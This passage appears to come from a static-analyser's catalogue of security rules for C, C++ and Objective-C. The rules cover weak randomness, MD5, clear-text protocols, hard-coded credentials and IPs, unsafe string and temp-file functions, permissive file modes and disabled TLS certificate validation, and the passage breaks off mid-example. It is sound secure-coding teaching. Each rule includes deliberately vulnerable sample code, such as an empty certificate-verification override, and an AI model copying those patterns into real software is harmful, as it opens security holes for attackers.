  • Use functions which rely on a strong random number generator such as randombytes_uniform() or randombytes_buf() from libsodium, or randomize() from Botan.
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

#include <random>
// ...

void f() {
  int random_int = std::rand(); // Sensitive
}

Compliant Solution

#include <sodium.h>
#include <botan/system_rng.h>
// ...

void f() {
  char random_chars[10];
  randombytes_buf(random_chars, 10); // Compliant
  uint32_t random_int = randombytes_uniform(10); // Compliant

  uint8_t random_bytes[10];
  Botan::System_RNG system;
  system.randomize(random_bytes, 10); // Compliant
}

See

objc:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.

Sensitive Code Example

#include <botan/hash.h>
// ...

Botan::secure_vector<uint8_t> f(std::string input){
    std::unique_ptr<Botan::HashFunction> hash(Botan::HashFunction::create("MD5")); // Sensitive
    return hash->process(input);
}

Compliant Solution

#include <botan/hash.h>
// ...

Botan::secure_vector<uint8_t> f(std::string input){
    std::unique_ptr<Botan::HashFunction> hash(Botan::HashFunction::create("SHA-512")); // Compliant
    return hash->process(input);
}

See

objc:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances of attackers to successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that the use of the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

char* http_url = "http://example.com"; // Sensitive
char* ftp_url = "ftp://anonymous@example.com"; // Sensitive
char* telnet_url = "telnet://anonymous@example.com"; // Sensitive
#include <curl/curl.h>

CURL *curl_ftp = curl_easy_init();
curl_easy_setopt(curl_ftp, CURLOPT_URL, "ftp://example.com/"); // Sensitive

CURL *curl_smtp = curl_easy_init();
curl_easy_setopt(curl_smtp, CURLOPT_URL, "smtp://example.com:587"); // Sensitive

Compliant Solution

char* https_url = "https://example.com";
char* sftp_url = "sftp://anonymous@example.com";
char* ssh_url = "ssh://anonymous@example.com";
#include <curl/curl.h>

CURL *curl_ftps = curl_easy_init();
curl_easy_setopt(curl_ftps, CURLOPT_URL, "ftp://example.com/");
curl_easy_setopt(curl_ftps, CURLOPT_USE_SSL, CURLUSESSL_ALL); // FTP transport is done over TLS

CURL *curl_smtp_tls = curl_easy_init();
curl_easy_setopt(curl_smtp_tls, CURLOPT_URL, "smtp://example.com:587");
curl_easy_setopt(curl_smtp_tls, CURLOPT_USE_SSL, CURLUSESSL_ALL); // SMTP with STARTTLS

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.

See

objc:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule looks for hard-coded credentials in variable names that match any of the patterns from the provided list.

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.
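One way to implement the helper used in the compliant solution below is to resolve the secret at runtime from the environment. This is a sketch; the DB_PASSWORD variable name is an assumption, not part of the rule:

```cpp
#include <cstdlib>
#include <string>

// Sketch: resolve the secret at runtime instead of hard-coding it.
// The DB_PASSWORD environment variable name is illustrative.
std::string getDatabasePassword() {
    const char *value = std::getenv("DB_PASSWORD");
    return value != nullptr ? std::string(value) : std::string();
}
```

In production, a secrets-management service is preferable to plain environment variables, but either keeps the credential out of the source code and the binary.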

Sensitive Code Example

dbi_conn conn = dbi_conn_new("mysql");
string password = "secret"; // Sensitive
dbi_conn_set_option(conn, "password", password.c_str());

Compliant Solution

dbi_conn conn = dbi_conn_new("mysql");
string password = getDatabasePassword(); // Compliant
dbi_conn_set_option(conn, "password", password.c_str()); // Compliant

See

objc:S5798

Why is this an issue?

The compiler is generally allowed to remove code that does not have any effect, according to the abstract machine of the C language. This means that if you have a buffer that contains sensitive data (for instance passwords), calling memset on the buffer before releasing the memory will probably be optimized away.

The function memset_s behaves similarly to memset, but the main difference is that it cannot be optimized away: the memory will be overwritten in all cases. You should always use this function to scrub security-sensitive data.

This rule raises an issue when a call to memset is followed by the destruction of the buffer.

Note that memset_s is defined in annex K of C11, so to have access to it, you need a standard library that supports it (this can be tested with the macro __STDC_LIB_EXT1__), and you need to enable it by defining the macro __STDC_WANT_LIB_EXT1__ before including <string.h>. Other platform-specific functions can perform the same operation, for instance SecureZeroMemory (Windows) or explicit_bzero (FreeBSD).

Noncompliant code example

void f(char *password, size_t bufferSize) {
  char localToken[256];
  init(localToken, password);
  memset(password, ' ', strlen(password)); // Noncompliant, password is about to be freed
  memset(localToken, ' ', strlen(localToken)); // Noncompliant, localToken is about to go out of scope
  free(password);
}

Compliant solution

void f(char *password, size_t bufferSize) {
  char localToken[256];
  init(localToken, password);
  memset_s(password, bufferSize, ' ', strlen(password));
  memset_s(localToken, sizeof(localToken), ' ', strlen(localToken));
  free(password);
}
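When none of memset_s, SecureZeroMemory, or explicit_bzero is available, a common portable fallback is to write through a volatile pointer so the compiler cannot prove the stores are dead and elide them. This is a sketch of that technique, not part of the rule's examples:

```cpp
#include <cstddef>

// Portable scrubbing fallback: the volatile qualifier forces each store to
// be performed, so the wipe is not optimized away like a plain memset
// before free() or end of scope would be.
void secure_scrub(void *buffer, size_t size) {
    volatile unsigned char *p = static_cast<volatile unsigned char *>(buffer);
    while (size--) {
        *p++ = 0;
    }
}
```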

Resources

objc:S1079

Why is this an issue?

The %s placeholder is used to read a word into a string.

By default, there is no restriction on the length of that word, and the developer is required to pass a sufficiently large buffer for storing it.

No matter how large the buffer is, there will always be a longer word.

Therefore, programs relying on %s are vulnerable to buffer overflows.

A field width specifier can be used together with the %s placeholder to limit the number of bytes which will be written to the buffer.

Note that an additional byte is required to store the null terminator.

Noncompliant code example

char buffer[10];
scanf("%s", buffer);      // Noncompliant - will overflow when a word longer than 9 characters is entered

Compliant solution

char buffer[10];
scanf("%9s", buffer);     // Compliant - will not overflow
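The same width-specifier rule applies to sscanf, which makes the truncation easy to observe without reading from stdin. This is an illustrative sketch, not part of the rule's examples:

```cpp
#include <cstdio>
#include <cstring>

// Sketch: "%9s" stops after 9 characters, leaving room for the '\0' in a
// 10-byte buffer, so an over-long word is truncated instead of overflowing.
bool width_specifier_truncates() {
    char buffer[10];
    sscanf("supercalifragilistic", "%9s", buffer); // reads at most 9 chars + '\0'
    return strcmp(buffer, "supercali") == 0;       // input safely truncated
}
```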

Resources

objc:S5443

Operating systems have global directories where any user has write access. Those folders are mostly used as temporary storage areas like /tmp in Linux based systems. An application manipulating files from these folders is exposed to race conditions on filenames: a malicious user can try to create a file with a predictable name before the application does. A successful attack can result in other files being accessed, modified, corrupted or deleted. This risk is even higher if the application runs with elevated permissions.

In the past, it has led to the following vulnerabilities:

This rule raises an issue whenever it detects a hard-coded path to a publicly writable directory like /tmp (see examples below). It also detects access to environment variables that point to publicly writable directories, e.g., TMP and TMPDIR.

  • /tmp
  • /var/tmp
  • /usr/tmp
  • /dev/shm
  • /dev/mqueue
  • /run/lock
  • /var/run/lock
  • /Library/Caches
  • /Users/Shared
  • /private/tmp
  • /private/var/tmp
  • \Windows\Temp
  • \Temp
  • \TMP

Ask Yourself Whether

  • Files are read from or written into a publicly writable folder
  • The application creates files with predictable names into a publicly writable folder

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a dedicated sub-folder with tightly controlled permissions
  • Use secure-by-design APIs to create temporary files. Such API will make sure:
    • The generated filename is unpredictable
    • The file is readable and writable only by the creating user ID
    • The file descriptor is not inherited by child processes
    • The file will be destroyed as soon as it is closed
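The POSIX mkstemp() function is one such secure-by-design API. A minimal sketch (the /tmp prefix and path template are illustrative):

```cpp
#include <cstdlib>
#include <unistd.h>

// Sketch: mkstemp() replaces the XXXXXX suffix with an unpredictable value
// and creates the file exclusively with mode 0600 (owner-only access).
int create_private_tempfile() {
    char path[] = "/tmp/myapp_XXXXXX"; // template; mkstemp randomizes the suffix
    int fd = mkstemp(path);            // created with O_EXCL, owner-only mode
    if (fd != -1) {
        unlink(path);                  // file is destroyed once fd is closed
    }
    return fd;                         // -1 on failure
}
```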

Sensitive Code Example

#include <cstdio>
// ...

void f() {
  FILE * fp = fopen("/tmp/temporary_file", "r"); // Sensitive
}
#include <cstdio>
#include <cstdlib>
#include <sstream>
// ...

void f() {
  std::stringstream ss;
  ss << getenv("TMPDIR") << "/temporary_file"; // Sensitive
  FILE * fp = fopen(ss.str().c_str(), "w");
}

Compliant Solution

#include <cstdio>
#include <cstdlib>
// ...

void f() {
  FILE * fp = tmpfile(); // Compliant
}

See

objc:S2612

In Unix file system permissions, the "others" category refers to all users except the owner of the file system resource and the members of the group assigned to this resource.

Granting permissions to this category can lead to unintended access to files or directories that could allow attackers to obtain sensitive information, disrupt services or elevate privileges.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

When creating a file or directory with permissions granted to "others":

open("myfile.txt", O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO); // Sensitive: the process sets 777 permissions on this newly created file

mkdir("myfolder", S_IRWXU | S_IRWXG | S_IRWXO); // Sensitive: the process tries to set 777 permissions on this newly created directory

When explicitly adding permissions for "others" with the chmod, fchmod or filesystem::permissions functions:

chmod("myfile.txt", S_IRWXU | S_IRWXG | S_IRWXO);  // Sensitive: the process sets 777 permissions on this file

fchmod(fd, S_IRWXU | S_IRWXG | S_IRWXO); // Sensitive: the process sets 777 permissions on this file descriptor

When defining a umask that does not mask out the read, write and execute permissions for "others":

umask(S_IRWXU | S_IRWXG); // Sensitive: files and folders created afterwards may grant permissions to "others"

Compliant Solution

When creating a file or directory, do not set permissions to "other group":

open("myfile.txt", O_CREAT, S_IRWXU | S_IRWXG); // Compliant

mkdir("myfolder", S_IRWXU | S_IRWXG); // Compliant

When using chmod, fchmod or filesystem::permissions functions, do not add permissions to "other group":

chmod("myfile.txt", S_IRWXU | S_IRWXG);  // Compliant

fchmod(fd, S_IRWXU | S_IRWXG); // Compliant

When defining the umask, mask the read, write and execute permissions of the "others" category:

umask(S_IRWXO); // Compliant: further created files or directories will not have permissions set for "other group"
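
The interaction between the umask and the mode passed to open can be checked directly. The sketch below, assuming a POSIX system (the file path and helper name are illustrative), masks the "others" bits, creates a file with a fully permissive requested mode, and returns the permissions the file actually received:

```c
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Create `path` with a requested mode of 777, but with the "others"
 * bits removed by the umask; returns the resulting permission bits. */
mode_t create_without_others(const char *path) {
    mode_t old = umask(S_IRWXO);   /* mask read/write/execute for "others" */
    int fd = open(path, O_CREAT | O_EXCL | O_WRONLY, S_IRWXU | S_IRWXG | S_IRWXO);
    umask(old);                    /* restore the previous mask */
    if (fd == -1)
        return (mode_t)-1;
    struct stat st;
    fstat(fd, &st);
    close(fd);
    unlink(path);                  /* remove the demonstration file */
    return st.st_mode & (S_IRWXU | S_IRWXG | S_IRWXO);
}
```

Whatever mode is requested, the returned bits never include S_IRWXO, because the kernel clears every bit that is set in the umask.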

See

objc:S1081

Why is this an issue?

When using typical C functions, it’s up to the developer to make sure the size of the buffer to be written to is large enough to avoid buffer overflows. Buffer overflows can cause the program to crash at a minimum. At worst, a carefully crafted overflow can cause malicious code to be executed.

This rule reports use of the following insecure functions, for which knowing the required size is not generally possible: gets() and getpw().

In such cases, the only way to prevent buffer overflows while using these functions would be to control the execution context of the application.

It is much safer to secure the application from within and to use an alternate, secure function which allows you to define the maximum number of characters to be written to the buffer:

  • fgets or gets_s
  • getpwuid

Noncompliant code example

gets(str); // Noncompliant; `str` buffer size is not checked and it is vulnerable to overflows

Compliant solution

gets_s(str, sizeof(str)); // Prevent overflows by enforcing a maximum size for `str` buffer
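
Where Annex K's gets_s is unavailable, fgets provides the same bound with standard C alone. A minimal sketch (the helper name read_line is illustrative):

```c
#include <stdio.h>
#include <string.h>

/* Read one line from `stream` into `buf`, writing at most `size` bytes
 * including the terminating null; returns 0 on success, -1 on EOF/error. */
int read_line(char *buf, size_t size, FILE *stream) {
    if (fgets(buf, (int)size, stream) == NULL)
        return -1;
    buf[strcspn(buf, "\n")] = '\0';  /* drop the trailing newline, if any */
    return 0;
}
```

Unlike gets, fgets keeps the newline in the buffer, hence the strcspn step.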

Resources

objc:S5814

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strcat( char *restrict dest, const char *restrict src ); appends the characters of string src at the end of dest. The wcscat does the same for wide characters and should be used with the same guidelines.

Note: the functions strncat and wcsncat might look like attractive safe replacements for strcat and wcscat, but they have their own set of issues (see S5815), and you should probably prefer a better-suited alternative.

Ask Yourself Whether

  • There is a possibility that either the src or the dest pointer is null
  • The current string length of dest plus the current string length of src plus 1 (for the final null character) is larger than the size of the buffer pointed to by dest
  • There is a possibility that either string is not correctly null-terminated

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, the strcat_s and the wcscat_s functions that were designed as safer alternatives to strcat and wcscat. Using them in all circumstances is not recommended, because they introduce a runtime overhead and require more error-handling code, but they perform checks that limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strcpy(dest, "Result: ");
  strcat(dest, src); // Sensitive: might overflow
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char result[] = "Result: ";
  char *dest = malloc(sizeof(result) + strlen(src)); // No need for +1 for the final null: sizeof(result) already counts its terminator
  strcpy(dest, result);
  strcat(dest, src); // Compliant: the buffer size was carefully crafted
  int r = doSomethingWith(dest);
  free(dest);
  return r;
}
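
Another standard option that removes the manual size arithmetic is snprintf, which truncates instead of overflowing and reports the length it would have needed. A sketch under that approach (build_result is an illustrative helper, not part of the rule):

```c
#include <stdio.h>

/* Build "Result: <src>" into `dest` (capacity `size` bytes);
 * returns 0 on success, -1 on encoding error or truncation. */
int build_result(char *dest, size_t size, const char *src) {
    int needed = snprintf(dest, size, "Result: %s", src);
    if (needed < 0 || (size_t)needed >= size)
        return -1;  /* the full string did not fit */
    return 0;
}
```

Checking the return value against the buffer size detects truncation, which strncat alone does not report.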

See

objc:S5813

The function size_t strlen(const char *s) measures the length of the string s (excluding the final null character).
The function size_t wcslen(const wchar_t *s) does the same for wide characters, and should be used with the same guidelines.

Similarly to many other functions in the standard C libraries, strlen and wcslen assume that their argument is not a null pointer.

Additionally, they expect the strings to be null-terminated. For example, the 5-letter string "abcde" must be stored in memory as "abcde\0" (i.e. using 6 characters) to be processed correctly. When a string is missing the null character at the end, these functions will iterate past the end of the buffer, which is undefined behavior.

Therefore, string parameters must end with a proper null character. The absence of this particular character can lead to security vulnerabilities that allow, for example, access to sensitive data or the execution of arbitrary code.

Ask Yourself Whether

  • There is a possibility that the pointer is null.
  • There is a possibility that the string is not correctly null-terminated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use safer functions. The C11 functions strlen_s and wcslen_s from annex K handle typical programming errors.
    Note, however, that they have a runtime overhead and require more code for error handling and therefore are not suited to every case.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions.
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone.

Sensitive Code Example

size_t f(char *src) {
  char dest[256];
  strncpy(dest, src, sizeof dest); // Truncation may happen
  return strlen(dest); // Sensitive: "dest" will not be null-terminated if truncation happened
}

Compliant Solution

size_t f(char *src) {
  char dest[256];
  strncpy(dest, src, sizeof dest); // Truncation may happen
  dest[sizeof dest - 1] = 0;
  return strlen(dest); // Compliant: "dest" is guaranteed to be null-terminated
}
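
POSIX also provides strnlen for exactly this situation: it never examines more than a given number of bytes, so it stays inside the buffer even when the terminator is missing. A portable sketch of the same behavior (the helper name is illustrative):

```c
#include <stddef.h>

/* Length of `s`, but never more than `max`, and never reading s[max] or beyond. */
size_t bounded_length(const char *s, size_t max) {
    size_t i = 0;
    while (i < max && s[i] != '\0')
        i++;
    return i;
}
```

A result equal to max signals that no terminator was found within the bound.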

See

  • MITRE, CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
  • CERT, STR07-C. - Use the bounds-checking interfaces for string manipulation
objc:S5816

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strncpy(char * restrict dest, const char * restrict src, size_t count); copies the first count characters from src to dest, stopping at the first null character, and filling extra space with 0. The wcsncpy does the same for wide characters and should be used with the same guidelines.

Both of those functions are designed to work with fixed-length strings and might result in a non-null-terminated string.

Ask Yourself Whether

  • There is a possibility that either the source or the destination pointer is null
  • The security of your system can be compromised if the destination is a truncated version of the source
  • The source buffer can be both non-null-terminated and smaller than the count
  • The destination buffer can be smaller than the count
  • You expect dest to be a null-terminated string
  • There is an overlap between the source and the destination

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, the strncpy_s and the wcsncpy_s functions that were designed as safer alternatives to strncpy and wcsncpy. Using them in all circumstances is not recommended, because they introduce a runtime overhead and require more error-handling code, but they perform checks that limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions
  • If you are using strncpy and wcsncpy as safer versions of strcpy and wcscpy, you should instead consider strcpy_s and wcscpy_s, because strncpy and wcsncpy have several shortcomings:
    • It’s not easy to detect truncation
    • Too much work is done to fill the buffer with 0, leading to suboptimal performance
    • Unless manually corrected, the dest string might not be null-terminated
  • If you want to use strcpy and wcscpy functions and detect if the string was truncated, the pattern is the following:
    • Set the last character of the buffer to null
    • Call the function
    • Check if the last character of the buffer is still null
  • If you are writing C++ code, using std::string to manipulate strings is much simpler and less error-prone

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strncpy(dest, src, sizeof(dest)); // Sensitive: might silently truncate
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char dest[256];
  dest[sizeof dest - 1] = 0;
  strncpy(dest, src, sizeof(dest)); // Compliant
  if (dest[sizeof dest - 1] != 0) {
    // Handle error
  }
  return doSomethingWith(dest);
}

See

objc:S5815

In C, a string is just a buffer of characters, normally using the null character as a sentinel for the end of the string. This means that the developer has to be aware of low-level details such as buffer sizes or having an extra character to store the final null character. Doing that correctly and consistently is notoriously difficult and any error can lead to a security vulnerability, for instance, giving access to sensitive data or allowing arbitrary code execution.

The function char *strncat( char *restrict dest, const char *restrict src, size_t count ); appends the characters of string src to the end of dest, but copies at most count characters; dest is always null-terminated afterwards. The wcsncat does the same for wide characters, and should be used with the same guidelines.

Ask Yourself Whether

  • There is a possibility that either the src or the dest pointer is null
  • The current string length of dest plus the current string length of src plus 1 (for the final null character) is larger than the size of the buffer pointed to by dest
  • There is a possibility that either string is not correctly null-terminated

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • C11 provides, in its annex K, the strncat_s and the wcsncat_s functions that were designed as safer alternatives to strncat and wcsncat. Using them in all circumstances is not recommended, because they introduce a runtime overhead and require more error-handling code, but they perform checks that limit the consequences of calling the function with bad arguments.
  • Even if your compiler does not exactly support annex K, you probably have access to similar functions
  • If you are using strncat and wcsncat as safer versions of strcat and wcscat, you should instead consider strcat_s and wcscat_s, because strncat and wcsncat have several shortcomings:
    • It’s not easy to detect truncation
    • The count parameter is error-prone
    • Computing the count parameter typically requires computing the string length of dest, at which point other simpler alternatives exist

Sensitive Code Example

int f(char *src) {
  char dest[256];
  strcpy(dest, "Result: ");
  strncat(dest, src, sizeof dest); // Sensitive: passing the buffer size instead of the remaining size
  return doSomethingWith(dest);
}

Compliant Solution

int f(char *src) {
  char result[] = "Result: ";
  char dest[256];
  strcpy(dest, result);
  strncat(dest, src, sizeof dest - sizeof result); // Compliant but may silently truncate
  return doSomethingWith(dest);
}
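
When strncat is kept, the count argument must be the remaining capacity of dest, not its total size; as the list above notes, computing it already requires the length of dest. A sketch of that computation (safe_append is an illustrative helper):

```c
#include <string.h>

/* Append `src` to `dest` (total capacity `size` bytes, null-terminated on
 * entry), passing strncat the remaining space rather than the buffer size.
 * Returns 0 on success, -1 if `src` had to be truncated. */
int safe_append(char *dest, size_t size, const char *src) {
    size_t used = strlen(dest);
    if (used + 1 >= size)
        return -1;                       /* no room left at all */
    size_t remaining = size - used - 1;  /* keep space for the final null */
    strncat(dest, src, remaining);
    return strlen(src) <= remaining ? 0 : -1;
}
```

The return value makes silent truncation detectable, which plain strncat does not.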

See

objc:S5824

The functions "tmpnam", "tmpnam_s" and "tmpnam_r" all return a file name that does not match an existing file, so that the application can create a temporary file. However, even if the file did not exist at the time those functions were called, it might exist by the time the application tries to use the name to create the file. This has been used by hackers to gain access to files that the application believed were trustworthy.

There are alternative functions that, in addition to creating a suitable file name, create and open the file and return the file handle. Such functions are protected from this attack vector and should be preferred. About the only remaining reason to use the name-generating functions is to create a temporary folder rather than a temporary file.

Additionally, these functions might not be thread-safe, and if you don’t provide them with buffers of sufficient size, you will get a buffer overflow.

Ask Yourself Whether

  • There is a possibility that several threads call any of these functions simultaneously
  • There is a possibility that the resulting file is opened without forcing its creation, meaning that it might have unexpected access rights
  • The buffers passed to these functions are respectively smaller than
    • L_tmpnam for tmpnam
    • L_tmpnam_s for tmpnam_s
    • L_tmpnam for tmpnam_r

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a function that directly opens the temporary file, such as tmpfile, tmpfile_s, mkstemp or mkstemps (the last two allow more accurate control of the file name).
  • If you can’t get rid of these functions, when using the generated name to open the file, use a function that forces the creation of the file and fails if the file already exists.

Sensitive Code Example

int f(char *tempData) {
  char *path = tmpnam(NULL); // Sensitive
  FILE* f = fopen(path, "w");
  fputs(tempData, f);
  fclose(f);
}

Compliant Solution

int f(char *tempData) {
  // The file will be opened in "wb+" mode, and will be automatically removed on normal program exit
  FILE* f = tmpfile(); // Compliant
  fputs(tempData, f);
  fclose(f);
}
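
When a file name is genuinely needed (for example, to pass to another process), POSIX mkstemp both generates the name and atomically creates and opens the file, closing the race window. A sketch (the template path below is illustrative):

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Create and open a unique temporary file; the trailing "XXXXXX" of the
 * template is replaced in place with a unique suffix. Returns the open
 * file descriptor, or -1 on failure. */
int open_temp(char *path_template) {
    int fd = mkstemp(path_template);  /* created with O_CREAT | O_EXCL, mode 0600 */
    if (fd == -1)
        perror("mkstemp");
    return fd;
}
```

After the call, path_template holds the actual file name, which can then be shared safely because the file already exists and is owned by the caller.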

See

objc:S1313

Hardcoding IP addresses is security-sensitive; it has led to vulnerabilities in the past.

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It encourages mistakenly using the same address in every environment (dev, sys, qa, prod).

Last but not least, it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks are always possible, but with a hardcoded IP address, fixing the issue takes more time, which increases the attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code; instead, make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentiality is not required, a domain name can be used, since it allows the destination to be changed quickly without rebuilding the software.

Sensitive Code Example

dbi_conn conn = dbi_conn_new("mysql");
string host = "10.10.0.1"; // Sensitive
dbi_conn_set_option(conn, "host", host.c_str());
dbi_conn_set_option(conn, "host", "10.10.0.1"); // Sensitive

Compliant Solution

dbi_conn conn = dbi_conn_new("mysql");
string host = getDatabaseHost(); // Compliant
dbi_conn_set_option(conn, "host", host.c_str()); // Compliant
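
getDatabaseHost above is a placeholder; one common implementation reads the address from the environment, sketched below (the variable name DB_HOST and the localhost fallback are illustrative choices, not part of the rule):

```c
#include <stdlib.h>

/* Resolve the database host from the environment instead of hardcoding it. */
const char *get_database_host(void) {
    const char *host = getenv("DB_HOST");      /* set by the deployment environment */
    return host != NULL ? host : "localhost";  /* local-development fallback */
}
```

With this approach, an operations team can repoint the service by changing the environment, with no rebuild and no address embedded in the binary.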

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

objc:S4830

This vulnerability makes it possible for an encrypted communication to be intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in Botan

Code examples

The following code contains examples of disabled certificate validation.

Certificate validation is disabled by overriding tls_verify_cert_chain with an empty implementation. It is highly recommended to keep the original implementation.

Noncompliant code example

#include <botan/tls_client.h>
#include <botan/tls_callbacks.h>
#include <botan/tls_session_manager.h>
#include <botan/tls_policy.h>
#include <botan/auto_rng.h>
#include <botan/certstor.h>
#include <botan/certstor_system.h>

class Callbacks : public Botan::TLS::Callbacks
{
    virtual void tls_verify_cert_chain(
              const std::vector<Botan::X509_Certificate> &cert_chain,
              const std::vector<std::shared_ptr<const Botan::OCSP::Response>> &ocsp_responses,
              const std::vector<Botan::Certificate_Store *> &trusted_roots,
              Botan::Usage_Type usage,
              const std::string &hostname,
              const Botan::TLS::Policy &policy)
    override  { }
};

class Client_Credentials : public Botan::Credentials_Manager { };

void connect() {
